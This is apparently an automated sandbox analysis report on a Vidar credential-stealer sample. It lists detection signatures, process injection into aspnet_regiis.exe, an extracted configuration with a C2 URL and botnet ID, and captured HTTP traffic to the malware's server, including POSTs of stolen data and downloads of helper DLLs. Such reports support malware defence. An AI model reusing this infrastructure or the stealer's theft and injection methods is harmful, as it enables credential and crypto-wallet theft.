Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1524654
MD5:d5251bd2a4d9ee464b1dbb25245a67a7
SHA1:a89c28d0c6f39475cf96c2129c4d10d73d0aa4b4
SHA256:5aa5f829532b82d1d146841d843de9d3ab2278ba2c52402d51d18a5a2823872f
Tags:exeuser-Bitsight
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7116 cmdline: "C:\Users\user\Desktop\file.exe" MD5: D5251BD2A4D9EE464B1DBB25245A67A7)
    • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 1420 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "b74ef0d8ce56e494b0d83e1d5be9dbeb"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                Click to see the 8 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                3.2.aspnet_regiis.exe.2a3f8e0.1.raw.unpackHiddenCobra_BANKSHOT_GenDetects Hidden Cobra BANKSHOT trojanFlorian Roth
                • 0x1e6ae:$x5: vchost.exe
                3.2.aspnet_regiis.exe.2a3dcd8.2.raw.unpackHiddenCobra_BANKSHOT_GenDetects Hidden Cobra BANKSHOT trojanFlorian Roth
                • 0x202b6:$x5: vchost.exe
                0.2.file.exe.6d5e2000.6.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  0.2.file.exe.6d5e2000.6.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                    0.2.file.exe.6d5e2000.6.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      Click to see the 5 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-03T03:26:45.002063+020020287653Unknown Traffic192.168.2.94971249.12.197.9443TCP
                      2024-10-03T03:26:46.181996+020020287653Unknown Traffic192.168.2.94971349.12.197.9443TCP
                      2024-10-03T03:26:47.706893+020020287653Unknown Traffic192.168.2.94971449.12.197.9443TCP
                      2024-10-03T03:26:49.063115+020020287653Unknown Traffic192.168.2.94971549.12.197.9443TCP
                      2024-10-03T03:26:50.472209+020020287653Unknown Traffic192.168.2.94971649.12.197.9443TCP
                      2024-10-03T03:26:51.910409+020020287653Unknown Traffic192.168.2.94971749.12.197.9443TCP
                      2024-10-03T03:26:53.184930+020020287653Unknown Traffic192.168.2.94971849.12.197.9443TCP
                      2024-10-03T03:26:56.335592+020020287653Unknown Traffic192.168.2.94971949.12.197.9443TCP
                      2024-10-03T03:26:57.427072+020020287653Unknown Traffic192.168.2.94972049.12.197.9443TCP
                      2024-10-03T03:26:59.780100+020020287653Unknown Traffic192.168.2.94972149.12.197.9443TCP
                      2024-10-03T03:27:01.221985+020020287653Unknown Traffic192.168.2.94972249.12.197.9443TCP
                      2024-10-03T03:27:03.387792+020020287653Unknown Traffic192.168.2.94972349.12.197.9443TCP
                      2024-10-03T03:27:06.072223+020020287653Unknown Traffic192.168.2.94972449.12.197.9443TCP
                      2024-10-03T03:27:08.017523+020020287653Unknown Traffic192.168.2.94972549.12.197.9443TCP
                      2024-10-03T03:27:09.758776+020020287653Unknown Traffic192.168.2.94972649.12.197.9443TCP
                      2024-10-03T03:27:11.287167+020020287653Unknown Traffic192.168.2.94972749.12.197.9443TCP
                      2024-10-03T03:27:14.650634+020020287653Unknown Traffic192.168.2.94972949.12.197.9443TCP
                      2024-10-03T03:27:16.347761+020020287653Unknown Traffic192.168.2.94973049.12.197.9443TCP
                      2024-10-03T03:27:17.745181+020020287653Unknown Traffic192.168.2.94973149.12.197.9443TCP
                      2024-10-03T03:27:19.571326+020020287653Unknown Traffic192.168.2.94973249.12.197.9443TCP
                      2024-10-03T03:27:21.565877+020020287653Unknown Traffic192.168.2.94973349.12.197.9443TCP
                      2024-10-03T03:27:23.962749+020020287653Unknown Traffic192.168.2.94973449.12.197.9443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-03T03:26:49.759104+020020442471Malware Command and Control Activity Detected49.12.197.9443192.168.2.949715TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-03T03:26:51.174591+020020518311Malware Command and Control Activity Detected49.12.197.9443192.168.2.949716TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-03T03:26:48.401039+020020490871A Network Trojan was detected192.168.2.94971449.12.197.9443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-03T03:27:25.798987+020028032702Potentially Bad Traffic192.168.2.949735147.45.44.10480TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "b74ef0d8ce56e494b0d83e1d5be9dbeb"}
                      Multi AV Scanner detection for submitted file
                      Source: file.exeVirustotal: Detection: 30%Perma Link
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\msvcp110.dllJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: file.exeJoe Sandbox ML: detected
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A080A1 CryptUnprotectData,LocalAlloc,LocalFree,3_2_02A080A1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A08048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,3_2_02A08048
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A11E5D CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,3_2_02A11E5D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A0A7D8 _memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcat,PK11_FreeSlot,lstrcat,3_2_02A0A7D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA76C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,3_2_6CA76C80
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.9:49711 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.9:49712 version: TLS 1.2
                      Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                      Source: Binary string: freebl3.pdb source: aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                      Source: Binary string: freebl3.pdbp source: aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                      Source: Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
                      Source: Binary string: softokn3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2672994085.000000003A0B1000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2668214599.000000002E1D7000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
                      Source: Binary string: nss3.pdb source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
                      Source: Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                      Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp
                      Source: Binary string: softokn3.pdb source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5D38ED FindFirstFileExW,0_2_6D5D38ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A15FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A15FD1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A0BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_02A0BF4D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A14CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,strtok_s,strtok_s,_memset,lstrcat,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,3_2_02A14CC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A1543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_02A1543D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A01D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A01D80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A0D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A0D5C6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A0B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_02A0B5DF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A09D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A09D1C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A15B0B GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,3_2_02A15B0B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A0B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A0B93F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A0CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,3_2_02A0CD37
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A15142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,3_2_02A15142
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]3_2_02A014AD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax3_2_02A014AD

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.9:49714 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.9:49715
                      Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.9:49716
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199780418869
                      Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 49.12.197.9 49.12.197.9
                      Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                      Source: Joe Sandbox ViewIP Address: 147.45.44.104 147.45.44.104
                      Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                      Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49715 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49718 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49713 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49712 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49714 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49717 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49716 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49721 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49722 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49719 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49720 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49723 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49724 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49725 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49727 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49726 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49731 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49732 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49733 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49734 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49735 -> 147.45.44.104:80
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49729 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49730 -> 49.12.197.9:443
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFHDBKFCAAECBFIDHJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBFIIEBGCAKKEBFBAAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGDAKEHJDHIDHJJDAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 6897Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKEBKJJDGHCBGCAAKEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCGCBFHCFCFBFIEBGHJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBKKFHIEGDHJKECAAKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
